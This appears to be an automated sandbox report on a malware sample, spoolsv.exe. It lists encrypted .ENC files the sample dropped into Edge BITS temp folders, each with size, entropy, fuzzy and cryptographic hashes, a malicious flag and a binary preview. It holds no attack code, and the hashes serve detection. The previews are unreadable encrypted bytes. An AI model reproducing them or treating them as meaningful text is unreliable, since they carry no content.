                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}.....u...)@/]...y.[.$.<....z..N.....-..[..z...K..o.l.]z.EW..~.....Y0.A....mQ.>h .#..M..C..._}...I..$.l..H.....). ./.B..VD64.....J...I.C..L...3?..P..>.7._?X;-....Y......o....a:.>.......{M}x.W.SA...SS-.[tT...c.r..lZ.;x~.!)..g..W.7..6O#vg....Q.9.Y.UX..p!.!g...Nh.D).]..$.o.lUhk9..\u.......~r.'.pG.n..?(...z._.WM..q-oU..hx.\....n.4CK...vX..>.... .q...+...d8..=.....GU..X.v.ff..v.70.....A...d.CGE~.... ...W. [...\.zd.{&CW.....0_..Y.F..#...@..sp......;..x.g. i........1..!.[.q..3...@5..l.,...u.^M.'...07....F.W...!...H....\.....%.s....4.I\.Z....g.R.I..../.3..w.j.\..._%.@..p.~>....j.K.d.Z....(."..2.V...c.#z..?...~q8....:]o..9.'.NE.=cS..c...Rc..[..|...G.6?...#...W...p).k......h.ti3........w.WA4..NH.|y.<.JI-.!....W.bK....i\i...:3..........Z./..2.p[.!47.....qE.|.s..3.K.. @..c..c....7f.._U.`..e..Q...).4.2...."]vw.5...b).ij6..[p&.|..WH4.Y....=J3../.uq..P.CS{7,....<h.......-.[.../......&....a5.;.yW.UP.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1164849323\ef5f792e-9df7-4748-accf-02ec33a4a2c4.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1888
                                                                                                                                                                                                                                                      Entropy (8bit):7.89582902363822
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:6xrZ5KpYgOdaBbn7ZHyjgZYFm64IqqQvUP:IZIuhaxn9Hyj1Fm6dQi
                                                                                                                                                                                                                                                      MD5:D5A0CA5572D0C3B0006B68FAD6E28C09
                                                                                                                                                                                                                                                      SHA1:C555D6439467C23ACAA0DBB69F9C57261F0EE22C
                                                                                                                                                                                                                                                      SHA-256:3881755AEB905231F49C47C53CE584364EE3D35F1A116F18B42AFBA8F68FC2B5
                                                                                                                                                                                                                                                      SHA-512:EFCA5DBE44B965C8A0EA9C7AE0EB94F46006875E58C3F513BE2A73CAA85152AC7EFDC29DB0353F6259D2AD9D2F0D0CE81197805B669804C41A9C4E5741D271DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}*...g.....Xv.j......B|#.^.,...A.&.!....,.y...6.......Ch:."D.R=.u....Z...h.R^.0...u..`.~.(2.%]..r. }..N..-.F.k..G...~.}1.."...:...~.@8.%._.8.e$....1.)8q1P`..j..:.^B..........#Y....t....D...Uh....d.n...iq..O.....N*....,..B)'....O.R>|.4.M..1+..K.{...=.....w.....B..iY..\B..".*MV.n5... 4.^.!...v..Y.?.Q....CO.=..R@.....h..et...0.W...I...5.d..}..D.Z.K.8......T$..).V9...~.~.......q]^aTa.w^.t.V.1.)(./X......,..(.T......+uE$RL..$..!.U1..<.1...C..L....G..I...fB..?.......G.,9.&.......[h ..].....m)..sX..VE.G..>'i....a..9.S&c.,4J..T.....\I.b..<8-eIv..g.}.,..b..........V..X.........Y..$4cZI......i.;}...=7...".\&9....sph.....^A......Bq........#..\.VhM.\.;.".`.(.....a8.KN{.)--}....hE3..[4y...p....a.Fv....e.t=...V.`.ALu...K..x..J.u{y........O.{..Fu.%Q.S.D.#...H8\.(.6.2._...gC............5. m..`.%F.~.9.|.[....2....9p...S.}P....x..q.....".8...t.X....V.,..H..'...5...'.^a...jN..9.h....$y]..F.b.Gv.u..8H).Z.....=.#6z:B

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1414705840\e8d11bd0-b939-446e-b741-2c68ed471a53.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2774128
                                                                                                                                                                                                                                                      Entropy (8bit):7.999931208697001
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:49152:VBJ6m1/YG5dD9k48zyNk/6Dt4SHP95GW45ZTiVs3onreVcWTLOrPoxnaS+XPPMmg:VPDwWrkBzyNk9o5145EIoyCWTL6ohanU
                                                                                                                                                                                                                                                      MD5:1746EF1B1B5F34BD1FD713158726D26C
                                                                                                                                                                                                                                                      SHA1:81054EBE3E9EFA300079D1FF7720DB935025D5CC
                                                                                                                                                                                                                                                      SHA-256:38E39711B01861F0C72FB74158CBC5458F022061A7C44CE9711C224BC9AD5FDD
                                                                                                                                                                                                                                                      SHA-512:7D7C601215A51A32A5A9323BEEFAFBEE54314799A04E3996AFEB533A46CB33AC09F188AE23D88D2B62A8DCCC0BED641787F7845D8B25662F1EA1F5D4248A937B
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}..$._...M.d.....m...-.....L....9..=1bA;_.NG.....2V=?.}..,.KU..,........s~....n..\p.oG.X...X..g..:....fzt...V.......^^].e....V..V.....5.bf...1..5.=s.'.-..Z.,.-..g...+....y......."_....7.`...[...C.P.j;%.#e....%....W}..........V5..Z.@.(..6'H. r..Q.WtQ.....j..P...V..z..e.Y..^..>..l.p......0...?..u.w.....y.??..^0..|!.?hL.L....8....{......@.+#*.g.n.....y.fk....T....@.....Oo[.....1..Uq"hF~.o.k%...io.v[....W0.!..qs...x3"W6..7x...............C..}..6....b^..,.....t..@....[...#T.........+.~./h5...|>vB5[................X..'.[...... .. *.".L..Oc.,.?.."e-...Wd.s5.PE.lz.k?.d....B.......D....R.r......yq2.._..........|L.}`.@.`[.LLNz....M... ~x.*a..)h...g....ic.*,:.pyBi.EN0)....P...I..~.K.l.4.E.).=.......&......M.a...........?...}.5..2.9.0j.UmTc..."U.x.f.*>0.}1.a. u.r.7.....;C...+..>.@l.....&!F...N...........T=D. .\...ym.L..Y.8....@.W$.XT.........O.|....a~......~..e....F.dO......-....D.hYp.....3.u

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1974482915\01d00eb7-ae22-4601-b5b4-6bd76494c105.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4903056
                                                                                                                                                                                                                                                      Entropy (8bit):7.999960722460149
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:E4EZqdiKiRvtetpJjw90EnP5t092P5SiiC2ZwzYb8w770RFmyqxBpOrm:8cdvakxjwr0EriC2Zlv77jxBpv
                                                                                                                                                                                                                                                      MD5:BA67DFA7EEFFCEA216E357FD808E92D9
                                                                                                                                                                                                                                                      SHA1:104AE6168F10D2E04F5A6D6441AA092331D73C3C
                                                                                                                                                                                                                                                      SHA-256:D092516057E5FB60050B6EEEF67B9B4E4119F6245BA22F1483A5D52BD61E3AB0
                                                                                                                                                                                                                                                      SHA-512:8513938E4943232C24A3E42A935E2BE97338D4F74842B3D150ED9349C68B0B1CAA8E2B602E60B83E0685D1AA113EF2DBD1F0A0F9BCFAB2441B0D85490F5FABFD
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}.I.....u.OX...<!i..-........Q..6...@.........|..k.....iP8Z..b...s.....2.!.....Z...n.:..F.8......qI.B}......2.Z..k..z.0f....tMHC.m.~xf...-....t.P3.1S..w....(...7K...=J..J*....T.[LO..9^....7.}.s.0.USO.B+.1``...#f..1.....J.......+..!h..m.A.t...a._..0..LPdk.:[..:..?.\P.M?`..J..O........>w...5.c2.;V..O9..Nh.}-.)g....B.kG.....'.K...Ai?...L..@..`-.3.KA=*aZa.$.i.a~...'.2`.GY....L.jAe]y....|...S.Jg..l.4....#.r.....)..b..Og.M.IzO...=S.yw,6.6.i...:..E~v..B..3..x...tKOf.F.h.8.s...~..lQ.,....+.)..5..E.o.....].^.Q.(....T,.........~.....l.82q..%...u..Z-...W.7=..X....[....;.3.#.1f)K...CGz..V.R.....Q.#5.(c..#..R.....nS_.^:=$.{S......9.p...-.K.A.j_. ..l..|.M.b_...^.....Gq.)......1..<4.S6G.L#..u...Z.^.A[.2.a(CZ....U..e.....D.m..e..]w.U.8.x......{.0...a.p5...rg....g'[|.1-9q4.,W..r.`.Nf.;L.S...By..r....&..MJ..U@>8.<hX.S.D.U..n....T}V^|.Fy...[....S..RS..X.#....<.}..{...d.\uL.I..cf....m..q.C...2<.....[.0a0.$.M1@*}`.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1990501612\1187695d-8276-4e31-8de1-9e57768989bd.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):58896
                                                                                                                                                                                                                                                      Entropy (8bit):7.996666287901695
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:7L016x4M6U+bp+vkpl5RUUmj2glvsg/dQwaguCYBFOPxX2c:OKH+bpGkxRU9j2gZsg/nsYPn
                                                                                                                                                                                                                                                      MD5:847072C2DA7BD925D4D1AB1AE0593F6F
                                                                                                                                                                                                                                                      SHA1:652932FC0A33CCEE370A2801D6CC1D24AA903E22
                                                                                                                                                                                                                                                      SHA-256:24B34F46BAD9612C22D5D80DF70E3F0C30644B2C17DAA72EB7D747381A251755
                                                                                                                                                                                                                                                      SHA-512:8294D446755D7BEDE4751F90302EC58EDA38F6A872F6F5A3C0059DF9BCC040B44B46EB8F5F2449E9FC5F7DFE5D80035BC3E5118099B92D59A648E00FAD957220
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}-.*P.p.<.........{..Z...g.|..jF...#.e.\.o/fM!{..5hd.(..*.(..l.m.{.NF._.6W...#jw..O.t....Y.5.../...A1,.{.f.%......Xe.f.>3;..|..u.|W.._m...hS.}j.4..6..F..Hc....{.l0......,Y!..w...3:..G..1....X..O.~..R...]..uKv...h..0....a.5S......:..).q]=..gnu....uWb.~&....`..b.b..)..O.[.g..OS.t.lb..l....n. $...y.k.p[QFH......m.Z.....Hk.........\...y.5...eTm.....+=&*...8...6.c.9......l...ka%rtP.E.N....2.d#Qc.Nd(A._;G6..r@.C.gy'r?.H......r..&.s.[.0.f]l.4.......z....^....!...^.S4K.W.xc .Xs'.......9.C.D}...........C..:u..?.&...uL/HC.(v.4..[c6...#../.....Fz=J...ju.....&.L>...r../..H).b.E.B...].!...k...-.Z.e.....`.....p{..Z..K!%.....b.p.p%./4rj~R..s.....B....B.W.Vj...Yp.o.4).B..M.....z..g.w)......%..+...,.7t.6kb..F....A.e.I...9....y..............F.#*..W..7.N:|.W.d...'~..9-.K.&O....<K.|pMF...$...S..!?........EE..."[clz8.X..E..c...:.g....vl...*.!<De......s......^.<.MW......ZW......H.~.R 4.......OS9../.....=.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_2117939348\c78f9967-7a8c-44b0-ad94-732b63c89638.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):802144
                                                                                                                                                                                                                                                      Entropy (8bit):7.999769431939872
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:24576:jTvDXbxCi+qhzeJRYNQJwqMgSrBZM6vCNoPdi:3b/LBebmQJtFaZM2CQk
                                                                                                                                                                                                                                                      MD5:5B7A2D678D3306F3C1523E7AA40E7F52
                                                                                                                                                                                                                                                      SHA1:BD399635F80285799DEB110975815A492594273F
                                                                                                                                                                                                                                                      SHA-256:94D49E89DE2CAD710C70574E1CAE1A0B9C83C0D78672B0CA24B1AC7E18F8247B
                                                                                                                                                                                                                                                      SHA-512:FE22453A8ECE369235650436544023ABD77BA66F6ED7B816234CE82364885158740E8693365337E5F43DC10273F3F8DDA0D82EC3EE161D64F7C648A6931BA982
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}.!fcRq.4..G;H..v.:.!.P.(.H5.}o*.=.K..~..H\;...*....VG.........v:o0>....v....f.u....2.%*..n..Y..%.S<.9!.?.S..X.s.'*4......0k1T.....1zz.p...a.\."t.b..;....".;J..'....I:.c......Z..T.2...f.4._{'osV....r.4.,e.B..b!........Q..*.H-..,..f7v.....U....L.....U...+..A..].%<.i..d..`...h..Q.....p.O'B...e0.N..p_...6..B.A..:B..ECJ.;...4.'.q;{.v.k.E..$.. ......T..i.D.!14...._%..8.5.@.....Zq..h...1Ub.(.b>M...c.QR.m.....9...r~....2yV.`......\zy.8...w.L?{.W!......y7..>...d.a.........4...n...F../re..Y...)..5........Cwj...........f...L....B.K..j..7.4zn.2...y..5.#i.....D`..c..&n......'.CO..yQ4..B$....x.}..J.....?".T....{U./R./a!E=.....[.g.1.j.RZC.........>bf."....1(Wr]...s)n.y..l].^.?T......[.ke..x&.....eN...c..'.... ..8......a"R.+P..r...~f...T.NM.2lPr...v.C......a..=2..xWBW.L.4..3...n..8.._!..,E.&%....B.A"..n.P?.!..hi~.#}5..^O.f...5..Y.:Xx...W.HV......<.`FB2{p.....-..:..H.....*..(H.....Q...N.r.o\.g..|.t

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_233639511\b22f5f18-f7ea-4290-929d-b13c03908334.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.8650107057645915
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:jhEcmEQbeX/tKiwlaz7K16Y6R7DOTUhFtmzh8CsVaMs+gDGuTmau:Tm/evtZA8kQhFtGiWDGuaau
                                                                                                                                                                                                                                                      MD5:85BB3F82CDD9B88E819E4A10F558C08F
                                                                                                                                                                                                                                                      SHA1:1A7DC3432245C10471A3979C73D024E83C1CE349
                                                                                                                                                                                                                                                      SHA-256:65DD59B5F5616760AD8F8C87FB2F0AED3EB575C7E77CE11E56EEDE66AE18764A
                                                                                                                                                                                                                                                      SHA-512:9041435A8070EC8F315DEE65B304AC41379BE86BD431B1C81E9FD58EB0AB8ADEB7138ADED57977706D16646C745DA42F22C45FCBCC3D68B3F0AAAE79028EC511
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}&.y.t.*..s^p.......x.T'...C...n...3.W.b.6.F..[.O..t{.%H......@]aJ.w..{..P...~..j.To....&._b...#V..4}.>...L....&....H,B........ ..H..... ".N.T.?V.7f1z.>1..` .....H....M?.$(.u.b..$..g..C..;.B...9*.-..}..}.=_..`tl...Zb.q.....O.?..-/WY...l...i..b.7&..*...1..c..nD...........m..t;.=>.[...E...o..o..L.x-.V...i,+...i;F\UM.j`i..<..L.....\.W. @.z..6..Dx6./....D.-......E...&.?Z.....+t_.,o.-|C..v.R..\._.e.....M.#.......l..:..@.I...u.,c^H......c...f6..AB.o..1..H.\.5.o...nt.Tyy..iB.)d...L..w./..V.(T......,.l..8=B...%..o.|k.6i.l.e..7<.......[.B..}.B.......#a.F]&..Sj...7.8#.K....h...K..+..em.8m.+G...4.......P....d4n.R..FH...n.Eu..B.q(.bqk..4'..e.gr.6.>a.R.....+..f....p.7......oi. .......].]x..=..UD..o.J$.KX.........C....*+.=.t.V.{E...'... k.DmZV.5}..rTt..-..q._.....X5..x....X.;N}....`*:e).........).....O.p..[.)<.Y\.gg..<.. .......1.I.AS#..gPT.[._...E.....6.Z..N}-.U}...t.s.".s.1..K.d].>........N;l.......Z.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_308048737\12ed7c6f-b741-47d7-afa5-30f752dc978b.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):84832
                                                                                                                                                                                                                                                      Entropy (8bit):7.997907838386699
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:LrF/998iqKfZWRWtBWKqr1PiYdLv1dYe+1ooA4ky8n1uN1jstEz6qC:LrFDqKfRW18YjdH+1tRN1jm+6qC
                                                                                                                                                                                                                                                      MD5:605BF9613E1C8E9E65B3E5D73B818C5A
                                                                                                                                                                                                                                                      SHA1:9B8A43BA4F7C3F9CB3DD542D56EC7D9219FB4126
                                                                                                                                                                                                                                                      SHA-256:AB3846B20AF88A781299FD29E2CEA32639048D13DCD1B5CE02BC49E6D4812017
                                                                                                                                                                                                                                                      SHA-512:71D0D0E80D9D2483FB1BFB8F556CD5085414CFB5B42F034DC2305F21694D37090A3D026DAD37A20065B363F80DEE99F1ACA1CDA335B94B62163DA52BA1D4D320
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}.2...j ..6..3.....g...#^...+7.!..............<./.P......z....-..)....$.......5....BO.#.AH..C....e.d........d.z}B.^..c3&;..Yt%v..../....u.qp.:HWS....-O.H1+pj.."..^.3`n.w$.y...7..! .......F276...N5a......m]..w..u.:.c..p_......F......x....E.i..5}x...){/.}.<.u. ...X=:t......N~.h@5. h..0...V=.!^.!..A...TFdN..4d.A....|..`{^... 4...OH....si...a...+C,.+.....|..}.|.y.P.j........i_D..}...kd..9g,.d.Z...G..D..N...EK.t....K@.<u....).....:9k.H.F..6d.D..Jv..Y....#..[p{*......@."sT.....rR.....'G.....B...p....^q..?Z....zk.T.......1.v..#x.....Z. ....6#....$l..&..u..0...p[9.r....K..7..V.8.$N....C#.j..B"X..(}.v.qr......2.....D..r........gC.A.......N..k....9e$.1..V...}'np:.w6~...O......%..y.xO......&..'F..3/lL...".....G...r.gG.A6Z...|O...+6....(..i.....V.m........>.]..DY..=.@]ZZ.g.x..p.9PH.aEN..+y.0R-e.p.b.H.@.9.d..BP....Y...3...B..wg .J..8"...X.IGc......nj....XoO.... , ..$.Y..A......;V.j...S.7L^........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_435825870\5686322a-ffa9-43cd-98c7-9900dceae2d0.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4384
                                                                                                                                                                                                                                                      Entropy (8bit):7.953277806944743
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:tTRQJHO9xNjO6WmqBMDZ5NGuxMCN+XdqQtjFA:7Q8xlO4qKYuxMCudPLA
                                                                                                                                                                                                                                                      MD5:6746CE7618E6739F60BB66D433291621
                                                                                                                                                                                                                                                      SHA1:C859AD74A4AB11697258195D6335C5BE67610C07
                                                                                                                                                                                                                                                      SHA-256:E0A7EFFE933C2D752BDF31775B1855444FDA409CB60CC2ADF0AC7376A82FB016
                                                                                                                                                                                                                                                      SHA-512:0FE901300C180B6927F48F571F4E3645188A7743E37BFFCCC504F2E4F819B7D97DE5E1C882A0A5926B0F6F78011BD3A239A5668182A4CC6B94FCD758CBE51AE1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}E...0...r[d3.,.LB..=b2.+k#..A.....^.G....}P..n.n. .z7n....>..d...`..|...... ..\...`..t...m...e=....N..~..............!..g`.p..:...&tR....Y!~.#.tTk..Vxa..".U.([.[#..M.D..P....J..?-.Z.../B...`....q+.A../_=.&k#.1.....=..%...\...o..DR]..Sl.._J.C..l8.s...K.<$.8".g........Um...R..oJ%..2.......[.R..h4.........q"...hI.W.w..Bu.>.p..i...7.f.3t.q.H..3.6....Sy2F........uT7..h.....M.oA6.'.U+=3..zi .c.V.V.:K[.0.i6...kD...G....ZX.....e.[.../a.@.0.|(.=H.."e.....H..Q.+/.O..<.*.....(@...o............,k....<.....z.t..5.J.5.\...J.Yq....!3s..I..2IGz.)O...\&B..U@@iW.....-43......z.H.gw.(.P........(0Y....uO....]..../...bR ..9.8{An.F,..+OX....u...rj\..r.I.*V.;:.....o...;w..a.......?..tn..5......TX.1.......]....@ym...........$........$.K...G4..P....T...YP#."q..q*.........IW....&=.{.~..0.8@...f..N=<...........9}sg!. w..&...s..y.My......#K..U..]49.....m.f...%...r&..4.4....c...".$."...e....Q_l...../..f....._]b.dF!..55.]b..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_492380506\2132f61f-f790-4ae6-a355-8cf9a1533800.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):975584
                                                                                                                                                                                                                                                      Entropy (8bit):7.999828027706228
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:24576:fpquXPKt5vqPimY0oR7npV9iOEVS5kYaufuO:8uXPKJX0g7npLUVS5Va+uO
                                                                                                                                                                                                                                                      MD5:B84999CF31295DAB27D8CF41BC6E3D9E
                                                                                                                                                                                                                                                      SHA1:77099275CE352D1AAA54FC82A27AFC017A2FCD16
                                                                                                                                                                                                                                                      SHA-256:6F22E3E348F8EC16703EADCC59E67ECF5EC5432F5FF3EE791A8295716A467AF9
                                                                                                                                                                                                                                                      SHA-512:1942DA9CAEC6D62D7A48E439018F036BAB819AB42DEE157E74454FD49C778C9FE7F3CAB47919683EEF035E70F9F8F892BC5FB96F0F652316FF1658CF509DC612
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}/'.T.....&n^...Q.(.6.L....LZ.B.?jW.@_DT&......75Q v.y;.......;q...o.4A8..!".2..,Yr.>yI>.@h...v.j.@..[.....B.B.2(....Bq.4c..Bz.s.Z\......k..Qg.....F.r.b....pP.^..M.u.....Z... ..6/..%=........,..CS^g...f........M..>.+..!.......{.........Vf.m...._e.Pc..L.......x.._.]`.Q.?[.V.(....!s..M....[..(.rtGa..O9..bh8v.)."kO. .b[c.`.0/..A..,.+2...;...p.@........;..~..}......j..\..rd..A..&...;zh.0.......J..^KD...y&OS...........V.Y.cu'.(...j.,.a...1&9MM&.s.0..rW9..B.`so0...O_....L.m0.(QQ.i...NZW....U.T%1.7Lr.[.......n..b..*...S.....)...R&....a.D.t.f....+R....`6..^..q.O.........n..'E.(...}...5.....u......z..Aq...6...G......l.e.$.c..WR.K."..F2.o.W.:.. .f..8yR..)/uUz..M..7..E....F5hJ..G.[...l0.....*k....U.W9pc.x..A..I.V#8z..3..H.,0-.;'.c@.._....LL.J5.1P....tw.f...#at.z...m...i....,n...'.(.w..8.1\i..1..Y..L.<.xE...L.n.`0E.....2g..F}u.....QG.[a!..q......U....V..UTp..o.).JZ..=..|7...l.]ju.....".!0A.BI...y...H,`g..c...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_529259725\9e51170b-7adf-40ab-83b6-5f97b13bedcb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):201008
                                                                                                                                                                                                                                                      Entropy (8bit):7.999183095945348
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:czR0Onxh55gqzNJcncViVAgTc79Yb/AuN6:c1tnxhPbzgcFK/A/
                                                                                                                                                                                                                                                      MD5:1F5D61301C6A4739E2972B7E1560D1DB
                                                                                                                                                                                                                                                      SHA1:11F2017BB65DB2C1EA0E853677618A17B56D52F5
                                                                                                                                                                                                                                                      SHA-256:F8EFA773D731D9F3C059485BF84D6D944DE718126587DE7C8805AF1D477F8914
                                                                                                                                                                                                                                                      SHA-512:3D9099BC87713B38A5A4B31FBA98F92E7781F3FD6285628074E12EC17A427B911BE091006FB1C696464B681E630BC23530AD0EAFBD27AF6200A09D39B060E615
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}VY^1....Q..c.f.......S.....s.ET....+.f.^.....@.....z.w........}.$#y....3...P.. .~o..7........r.......}Ipi1J=............S..0.J.$6^..y......:L....9..:.......t...?....o.......LVv?B.}...@ Kv....ak.,{.2P7...u.C*'..&iD9.vY....3.1-o...q."8.n....0L..x..1..L...HF..&.o....t.V......i./4...:U.z..Y.I.0..%...p.j/..c.6T.Y.`.A.e.b,d.FV..J.^.S.}.........#.,.n[.a.}..a..Q....W.dn..eI.8.9_.a....1.u.......#V...i.8..K..m..:24..<Ll.k......J.#.'*...5.$.f.N..j..C]A.pFr......l......:.l.z........dM).A.`..W.9|.4E.r.r..x..!7W{.IC.D..K.I..H..Cy[.D.LyNA.m.v.A.v.P,.r..0K.._.I..CQO....:x.9.l>.......Qg.>j........]..t,..].{0.........E7ghTFk.._..G...6Nz..V8...... ..`+../by..F..#.&..JB,.;>."......z.J...a.#.._...|...?0|.f?........\jb...>..$..G|.*...^.l=.y.....zW.?R..J....a..\s..>MmRCK.q..Lk:J..j?W4}za.K..r.q.Vx.......T.qKX.D..Y>9.T;.m.........R.c.Hi....*X......Q6.}.....b....I..gD.u._...."...8.J0..`*gI.S...........J^.!Pi

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_600014076\2e8a592b-0ad4-414c-b996-21bd8749e2fd.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8064
                                                                                                                                                                                                                                                      Entropy (8bit):7.975706711524059
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:RcmmBxGfmvf2di5O1IKCZrR+hqULKO5ilKEB+BpznoTp:RsxG+ZUpCZrOzb57rpTG
                                                                                                                                                                                                                                                      MD5:EB005BF483D56CE6DA06A39122042C52
                                                                                                                                                                                                                                                      SHA1:18730B7D7E3E7D4627A8D217FC3DD9393DDDD037
                                                                                                                                                                                                                                                      SHA-256:B7731E594B990C24302957EBAE3162834B94F26130BF9F1B0B52D892D8E1CBB4
                                                                                                                                                                                                                                                      SHA-512:72F28D988B074E29383D85124FE6C14D2ACB01DFA8145AC14D404BFF670B89846AC0FE4844EA6897D53D7267E22D809C04840637234A0D73AEDC25EE48335A66
                                                                                                                                                                                                                                                      Malicious:false
